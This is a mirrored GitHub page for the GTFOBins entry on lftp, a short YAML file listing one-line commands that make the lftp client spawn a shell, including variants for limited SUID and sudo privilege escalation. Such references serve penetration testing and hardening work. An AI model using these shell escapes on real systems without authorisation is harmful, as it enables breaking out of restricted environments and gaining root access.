1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-23 08:31:34 +01:00
GTFOBins.github.io/_gtfobins/lftp.md
d4t4s3c 53a34f3c47
Add lftp
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-01-16 05:52:47 +01:00

10 lines
152 B
Markdown

---
functions:
shell:
- code: lftp -c '!/bin/sh'
limited-suid:
- code: ./lftp -c '!/bin/sh'
sudo:
- code: sudo lftp -c '!/bin/sh'
---